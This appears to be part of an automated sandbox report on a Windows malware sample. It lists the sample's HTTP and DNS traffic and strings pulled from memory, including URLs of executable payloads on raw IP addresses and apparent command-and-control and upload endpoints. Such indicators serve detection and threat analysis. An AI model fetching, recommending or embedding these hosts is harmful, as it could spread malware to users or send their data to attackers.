Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Source: global traffic	DNS traffic detected: DNS query: api64.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: nerv.com.pe
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: iplogger.org
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: tventyvf20pt.top
Source: global traffic	DNS traffic detected: DNS query: ckmqpoy.net
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org
Source: global traffic	DNS traffic detected: DNS query: nwgrus.ru

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.130.147.211/Files/1.exe
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.130.147.211/Files/1.exeC:
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.130.147.211/Files/1.exeM
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exe
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exe=
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exeC:
Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us3001
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300A
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300C:
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300a
Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300e
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300xe
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66e705d09b33c_jack.exe
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66e705d09b33c_jack.exeC
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66e705d09b33c_jack.exeC:
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66ed9885d9aee_Day2.exe
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66ed9885d9aee_Day2.exeC:
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xin
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xinC:
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xinxet
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66ee79315857f_setup33333.exe#lyla
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66ee79315857f_setup33333.exe#lylaC:
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66ee79315857f_setup33333.exe#lylabb
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1)
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#15l
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#18g
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1C:
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1Ra
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.109/kurwa
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.109/kurwaC:
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.109/kurwaS27
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.109/kurwaib
Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.33/thebig/noode.exe
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.33/thebig/noode.exe/
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.33/thebig/noode.exeC:
Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.33/thebig/noode.exeP
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.33/thebig/noode.exeR
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.33/thebig/noode.exet
Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.33/thebig/noode.exew
Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/O
Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/S
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/api/wp-admin.php
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/api/wp-admin.php9
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/api/wp-admin.phpRCHAR
Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/api/wp-admin.phpr
Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/api/wp-admin.phps
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/api/wp-ping.php
Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/g
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/j
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190:80/api/wp-admin.php
Source: RegAsm.exe, 00000002.00000002.1668271812.000000000455E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190:80/api/wp-admin.phpows
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190:80/api/wp-ping.php
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://aka.ms/msal-net-iwa
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://aka.ms/valid-authorities
Source: LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000000.1613620699.00000000008B2000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/http
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueshttp://schemas.xmlsoap.org/ws/2005/05/identity/NoP
Source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000000.1613620699.00000000008B2000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/shttp://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702iht
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2813113714.00000000012DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tventyvf20pt.top/
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2814480702.0000000001318000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1903774507.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2813113714.00000000012DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tventyvf20pt.top/d
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2814480702.0000000001318000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tventyvf20pt.top/v.
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1903774507.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2813113714.00000000012DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tventyvf20pt.top/v1/upload.php
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001301000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2814299974.0000000001304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tventyvf20pt.top/v1/upload.php)=
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2814803849.0000000001321000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1903774507.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tventyvf20pt.top/v1/upload.php1
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2813113714.00000000012DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tventyvf20pt.top/v1/upload.phpT
Source: kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000003.1642645243.0000000001F58000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: kvOccCLzMNloI4W4GuGOaRuh.exe, kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000003.1642645243.0000000001F58000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000003.1642645243.0000000001F58000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.remobjects.com/psU
Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1346588217.000000000420F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1346588217.00000000041A4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.0000000004101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.0000000004101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDllm_object
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/adal_token_cache_serialization
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-brokers
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-brokers.
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-client-apps
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-interactive-android
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-2-released)
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-3-breaking-changes
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-3-breaking-changesShttps://login.microsoftonline.com/common/
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-3-breaking-changesy
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-change
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-change)
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-changeC
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-application-configuration
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-b2c
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-brokers
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-enable-keychain-access
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/msal-net-enable-keychain-groups
